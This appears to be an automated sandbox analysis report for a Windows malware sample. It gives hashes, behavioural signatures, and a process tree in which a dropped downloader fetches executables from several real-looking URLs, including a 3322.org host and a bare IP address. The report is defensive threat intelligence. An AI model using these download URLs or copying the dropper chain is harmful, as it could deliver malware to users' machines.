Analysis
-
max time kernel
165s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2022 15:31
Static task
static1
Behavioral task
behavioral1
Sample
acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe
Resource
win7-20220901-en
Behavioral task
behavioral2
Sample
acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe
Resource
win10v2004-20221111-en
General
-
Target
acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe
-
Size
347KB
-
MD5
a7967e1aa22420c7f9d2aa74f14e2806
-
SHA1
e2326fe3a4542e1fe8652875092f45042e6a905c
-
SHA256
acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0
-
SHA512
8615d0cfadb558fe01c36b4516424bb30de90d92c5dae49a5917411277ce0e07e23712fe328be12df10ed30002488f56bf94ef0e74e08f938b6836dcdbf1de0b
-
SSDEEP
6144:BME1nmg1tDbJ5621YNzigKurmXGf09javBGL8ap7mdALnXOGkUTYAm802G1wZ743:ugnJziA/8vBva7m+Ln5kcjhHG1+UWw
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 2468 Urseiklmn.exe 2224 Urseiklmn.exe 3424 Urseiklmn.exe 3000 Urseiklmn.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 1336 wrote to memory of 2468 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 83 PID 1336 wrote to memory of 2468 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 83 PID 1336 wrote to memory of 2468 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 83 PID 1336 wrote to memory of 2224 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 86 PID 1336 wrote to memory of 2224 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 86 PID 1336 wrote to memory of 2224 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 86 PID 1336 wrote to memory of 3424 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 88 PID 1336 wrote to memory of 3424 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 88 PID 1336 wrote to memory of 3424 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 88 PID 1336 wrote to memory of 3000 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 92 PID 1336 wrote to memory of 3000 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 92 PID 1336 wrote to memory of 3000 1336 acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe 92
Processes
-
C:\Users\Admin\AppData\Local\Temp\acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe"C:\Users\Admin\AppData\Local\Temp\acafbb6610893f5da600a27947f3b5e8ecb98f47090945e90c4aa52bfb658ce0.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://gtszylcd.3322.org:8181/shenge.exe"2⤵
- Executes dropped EXE
PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://d1.downxia.net/downloader/setup3002.exe"2⤵
- Executes dropped EXE
PID:2224
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://dl.youbak.com/msn/software/partner/mfq/haoya.exe"2⤵
- Executes dropped EXE
PID:3424
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Urseiklmn.exe" "http://61.156.40.231:81/soft/OemWpsSetup40.6.exe"2⤵
- Executes dropped EXE
PID:3000
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
499KB
MD5783291f2ef79f9537cc509c53076c3b3
SHA1855265fd62d97bf04cda9a8d1cf0f3f6ede9300f
SHA2565bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4
SHA5122d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf
-
Filesize
499KB
MD5783291f2ef79f9537cc509c53076c3b3
SHA1855265fd62d97bf04cda9a8d1cf0f3f6ede9300f
SHA2565bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4
SHA5122d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf
-
Filesize
499KB
MD5783291f2ef79f9537cc509c53076c3b3
SHA1855265fd62d97bf04cda9a8d1cf0f3f6ede9300f
SHA2565bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4
SHA5122d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf
-
Filesize
499KB
MD5783291f2ef79f9537cc509c53076c3b3
SHA1855265fd62d97bf04cda9a8d1cf0f3f6ede9300f
SHA2565bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4
SHA5122d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf
-
Filesize
499KB
MD5783291f2ef79f9537cc509c53076c3b3
SHA1855265fd62d97bf04cda9a8d1cf0f3f6ede9300f
SHA2565bf59159c93899076a347ff40ebcbbea9dae7c8c16090e573171de248712c5d4
SHA5122d251b804cb40eed40bf3d714413471c2bd3397008fedb54fa6b279ced88feee8b4d07ac94993b89eeb329865a0e9dae5412ffd957f6e52bdf208d0f366dccdf